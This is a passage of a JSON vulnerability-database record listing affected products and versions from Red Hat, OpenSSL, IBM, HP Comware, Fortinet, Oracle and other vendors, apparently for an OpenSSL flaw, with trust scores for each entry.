        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "sun ray software",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "11.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2d"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1p"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.0t"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "oracle",
        "version": "5.0.13"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "oracle",
        "version": "4.3.35"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.14"
      },
      {
        "model": "security network controller 1.0.3361m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.10"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.19"
      },
      {
        "model": "(comware r2432p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59307)"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.4.10"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3.0.0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "api management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.6"
      },
      {
        "model": "fortimanager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.4"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.18"
      },
      {
        "model": "oncommand performance manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.0d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.1e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "hsr6602 (comware r3303p28",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "ru r3303p28.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66025"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.15"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "fortiauthenticator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "project openssl 1.0.1a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "fortimanager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.6"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.13"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.15"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "qradar incident forensics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.2.0"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1209"
      },
      {
        "model": "hp870 (comware r2607p51",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4.0.0"
      },
      {
        "model": "msr (comware r2516",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "30-165)"
      },
      {
        "model": "project openssl 1.0.0g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.3"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3361"
      },
      {
        "model": "10.1-release-p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "4500g (comware r2221p22",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "flex system fc3171 8gb san pass-thru",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "business process manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.5"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "fortiswitch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "mobile foundation consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.0.1"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3394"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.2"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.4.0"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.7"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.1.0"
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.4"
      },
      {
        "model": "msr (comware r2516",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "30-1x5)"
      },
      {
        "model": "fortiadc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "3.2.1"
      },
      {
        "model": "api management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0"
      },
      {
        "model": "qradar siem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.5"
      },
      {
        "model": "project openssl 1.0.0m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "smb (comware r1110",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "16205)"
      },
      {
        "model": "project openssl 1.0.1g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.4"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.4"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.5"
      },
      {
        "model": "qradar siem patch ifix01",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.44"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.16"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.6"
      },
      {
        "model": "10.1-release-p17",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.5"
      },
      {
        "model": "qradar siem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.2"
      },
      {
        "model": "mobile foundation enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.0.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.0"
      },
      {
        "model": "initiate master data service patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.210"
      },
      {
        "model": "project openssl 1.0.1i",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.9"
      },
      {
        "model": "fortimail",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "forticlient",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.3.091"
      },
      {
        "model": "msr20 (comware r2516",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.2"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.913"
      },
      {
        "model": "project openssl 1.0.0h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "msr 50-g2 (comware r2516",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "infosphere master data management patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "ctpview 7.3r1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.15"
      },
      {
        "model": "mobilefirst platform foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.0.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.211"
      },
      {
        "model": "si (comware r1517",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51205)"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.4.6"
      },
      {
        "model": "(comware r7180",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "105007)"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "rational clearquest",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.16"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.2.2"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.14"
      },
      {
        "model": "qlogic 8gb intelligent pass-thru module \u0026 san switch module for",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.10.1.38.00"
      },
      {
        "model": "icewall sso agent option",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.1"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "security network controller 1.0.3350m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.1"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.03"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.2.1"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.1"
      },
      {
        "model": "(comware r7180",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75007)"
      },
      {
        "model": "oncommand report",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.213"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.11"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.12"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.17"
      },
      {
        "model": "qlogic 8gb intelligent pass-thru module \u0026 san switch module for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.10"
      },
      {
        "model": "project openssl 1.0.0l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.13"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.1.0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.1"
      },
      {
        "model": "project openssl 1.0.0s",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "imc uam tam e0406",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.9"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.4"
      },
      {
        "model": "(comware r5319p15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "36105)"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.16"
      },
      {
        "model": "fortisandbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "2.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.2.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.28"
      },
      {
        "model": "msr2000 (comware r0306p12",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.13"
      },
      {
        "model": "vcx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.3"
      },
      {
        "model": "ei (comware r2221p22",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51205)"
      },
      {
        "model": "flex system fc3171 8gb san pass-thru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.8.01.00"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "worklight consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.0"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.2"
      },
      {
        "model": "proventia network enterprise scanner",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.06"
      },
      {
        "model": "security network controller 1.0.3387m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.4"
      },
      {
        "model": "mobile foundation consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.0.0"
      },
      {
        "model": "project openssl 1.0.1p",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network controller 1.0.3379m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.2"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.17"
      },
      {
        "model": "6125xlg r2432p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.2"
      },
      {
        "model": "infosphere master data management provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "(comware r2432p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59007)"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "hsr6800 (comware r7103p09",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "f5000-a (comware f3210p26",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.8"
      },
      {
        "model": "10.1-release-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.4"
      },
      {
        "model": "sonas",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.2.4"
      },
      {
        "model": "10.1-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "imc inode e0407",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "qradar siem patch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.34"
      },
      {
        "model": "project openssl 1.0.1c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "smartcloud entry appliance fixpac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1768"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.38"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "project openssl 1.0.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.2a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.3"
      },
      {
        "model": "altavault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "fortimanager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.3"
      },
      {
        "model": "project openssl 1.0.0t",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "worklight enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.0"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.12"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.3.3"
      },
      {
        "model": "qradar siem patch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.41"
      },
      {
        "model": "smb1910 (comware r1113",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "netezza diagnostics tools",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.1.2"
      },
      {
        "model": "hi (comware r5501p21",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55005)"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.3.4"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.9"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.3"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "qradar incident forensics patch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.53"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "project openssl 1.0.0o",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "worklight consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.2"
      },
      {
        "model": "fortirecorder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "2.0.1"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "mobilefirst platform foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.0"
      },
      {
        "model": "comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "70"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0"
      },
      {
        "model": "msr (comware r2516",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9xx5)"
      },
      {
        "model": "hp850 (comware r2607p51",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "imc wsm e0502p04",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "6127xlg r2432p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "a6600 (comware r3303p28",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "(comware r1810p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58005)"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.3.2"
      },
      {
        "model": "security access manager for mobile",
